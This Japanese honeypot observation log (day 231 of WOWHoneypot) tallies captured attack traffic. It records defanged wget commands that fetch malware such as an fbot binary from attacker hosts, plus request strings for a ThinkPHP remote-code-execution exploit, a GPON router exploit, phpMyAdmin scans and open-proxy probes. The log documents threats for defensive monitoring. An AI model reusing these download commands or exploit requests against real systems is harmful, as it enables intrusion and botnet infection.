WOWHoneypot観察(231日目)

トータルは4236件でした。

ハンティングログは以下です。

117.27.239[.]204 wget+hxxp[:]//185.223.163[.]17/b

89.248.174[.]206 wget+hxxp[:]//89.248.174[.]206/build/fbot[.]x86

IPのロケーション別の件数は以下です。

f:id:sec23:20191111173517p:plain

件数	概要	リクエスト
4173	Tomcat管理ページに対するブルートフォース攻撃	GET /manager/html
36	アクセス	GET /
5	phpMyAdminの調査	GET /admin-scripts.asp
3	調査	HEAD /
1		POST /script
1	DVR/NVR/IPC のAPIにおける脆弱性を狙った通信	POST /editBlackAndWhiteList
1	GPONルータの脆弱性を狙った通信	POST /GponForm/diag_Form?images/
1	クローリング	HEAD /robots.txt
1	不正中継の調査	HEAD hxxp[:]//123.125.114.144/
1	不正中継の調査	GET hxxp[:]//www.ip.cn/
1	不正中継の調査	GET hxxp[:]//www.epochtimes.com/
1	不正中継の調査	GET hxxp[:]//www.123cha.com/
1	ZmEuによるスキャン通信	GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1	ZmEuによるphpMyAdminのスキャン	GET /pma/scripts/setup.php
1	ZmEuによるphpMyAdminのスキャン	GET /phpmyadmin/scripts/setup.php
1	ZmEuによるphpMyAdminのスキャン	GET /phpMyAdmin/scripts/setup.php
1	ZmEuによるphpMyAdminのスキャン	GET /myadmin/scripts/setup.php
1	ZmEuによるphpMyAdminのスキャン	GET /MyAdmin/scripts/setup.php
1	ThinkPHPの脆弱性を狙った通信	POST /TP/public/index.php?s=captcha
1	ThinkPHPの脆弱性を狙った通信	GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
1	ThinkPHPの脆弱性を狙った通信	GET /TP/public/index.php
1	不正中継の試み	CONNECT www.baidu.com:443
1	不正中継の試み	CONNECT cn.bing.com:443

23log